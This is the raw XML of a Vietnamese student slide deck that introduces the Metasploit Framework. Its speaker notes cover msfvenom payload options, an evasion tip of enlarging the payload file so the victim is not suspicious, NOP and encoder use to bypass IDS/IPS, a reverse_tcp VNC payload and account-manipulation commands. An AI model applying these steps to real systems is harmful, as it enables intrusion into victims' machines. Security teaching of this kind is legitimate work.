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83" r:id="rId17"/>
    <p:sldId id="285" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="274" r:id="rId23"/>
    <p:sldId id="275" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="287" r:id="rId26"/>
    <p:sldId id="276" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="288" r:id="rId30"/>
    <p:sldId id="279" r:id="rId31"/>
    <p:sldId id="280" r:id="rId32"/>
    <p:sldId id="281"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31" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="96" y="48"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="250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BD1B6-1A11-4A6F-8F16-CCA581CCD502}"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5796A-5E03-471D-B714-AE15253CB9C6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145974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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236765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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NOP generator:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> NOP generator tạo ra một chuỗi các byte ngẫu nhiên mà bạn có thể sử dụng để bỏ qua các chữ ký IDS và IPS NOP tiêu chuẩn.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Encoder: Hỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> trợ mã hóa các Payloads và đảm bảo chúng tới đích</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1981242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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93051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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13522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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2905412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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47460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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303393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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3884640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Với các tham số –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> nền tảng windows, -a hạ tầng áp dụng là 32 bit hay 64 bit, -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> định dạng file xuất ra là exe, -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> dùng loại payload nào, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> là địa chỉ IP của máy mình, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> là cổng mở trên máy mình, -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> là vị trí lưu kèm đặt tên file xuất ra. Ngoài ra còn có các tham số như -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> lựa chọn kiểu mã hoá, -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> là số lần mã hoá payload, -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t> là kích thước file xuất ra (nặng nặng xíu cho victim khỏi nghi ngờ, vì bình thường file payload xuất ra chỉ cỡ vài chục hay vài trăm kB). Để biết chi tiết hơn các option, gõ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" smtClean="0"/>
              <a:t>msfvenom –h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" smtClean="0"/>
          </a:p>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181171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u="none" strike="noStrike" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> là một payload được sử dụng rộng rãi trong tấn công hệ điều hành Windows, có thể áp dụng trên hầu hết các phiên bản của Windows hiện nay. Sau khi khai thác thành công, Meterpreter sẽ là một remote shell (chương trình nhập lệnh điều khiển từ xa) cho phép hacker thực hiện các lệnh tấn công hay các công cụ trên hệ thống mục tiêu. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Meterpreter = Meta – Interpreter. </a:t>
            </a:r>
          </a:p>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2918100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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="434002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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1280782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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868502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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210415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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3562200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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3857096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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>payload windows/vncinject/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>whoami net user [tài_khoản] *</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1"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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302247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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>payload windows/vncinject/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>whoami net user [tài_khoản] *</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2584806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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>payload windows/vncinject/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>whoami net user [tài_khoản] *</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1"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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3302447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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1"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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2562701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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3543554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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1859024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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75959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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425707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 4.12.2</a:t>
            </a:r>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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283463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Quét cổng để xác định các dịch vụ đang hoạt động trên server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Xác định các lỗ hổng dựa trên phiên bản của hệ điều hành và phiên bản các phần mềm cài đặt trên hệ điều hành đó.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Thử nghiệm khai thác các lỗ hổng đã được xác định.</a:t>
            </a:r>
          </a:p>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="977828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REX : Thư viện ruby cho các công việc bảo mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -  Jacob Hammack – sử dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> các ứng dụng không phải của MSF</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Framework Core :Cung cấp giao diện cho việc chạy các module và plugins.</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MSF Base : để dễ giao tiếp hơn với các module trong framework.</a:t>
            </a:r>
          </a:p>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50417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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NOP generator:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> NOP generator tạo ra một chuỗi các byte ngẫu nhiên mà bạn có thể sử dụng để bỏ qua các chữ ký IDS và IPS NOP tiêu chuẩn.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Encoder: Hỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> trợ mã hóa các Payloads và đảm bảo chúng tới đích</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413486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5796A-5E03-471D-B714-AE15253CB9C6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345148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5EBA89-A778-4282-AEBB-5845F857FFC3}" type="datetime1">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12133261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A8619-354F-4916-81F6-E5FC51565529}" type="datetime1">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146674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1F7DD-F557-4EDA-83D0-0F999B9BA416}" type="datetime1">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48428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327D3-1AF7-434A-9D38-0A474CBCE6E7}" type="datetime1">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17243321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68009-C0D9-409D-9867-3D1DB04A45A5}" type="datetime1">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428838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BF1B18-7035-4D95-A250-C3C5CA997A77}" type="datetime1">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49708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233446-FE9E-4652-BCB9-6859EC47BDBA}" type="datetime1">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213829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3F5FE-8037-41B8-9A19-B742E4B170F9}" type="datetime1">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1967758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C96F3-1C84-47E9-95B7-1B2A37E04142}" type="datetime1">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39667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97980-03B2-4F28-A507-18EE8CE5C22A}" type="datetime1">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2510532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7B7D5-823F-4A1A-96DA-BE80ABFCE8B0}" type="datetime1">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48800" y="6492875"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284349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jimmi2051@gmail.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B332-9346-419B-A417-A839F73A7328}" type="datetime1">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Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6510528"/>
            <a:ext cx="12192000" cy="3474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l"/>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nhóm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 7 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Framework – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Liên</a:t>
            </a:r>
            <a:r>
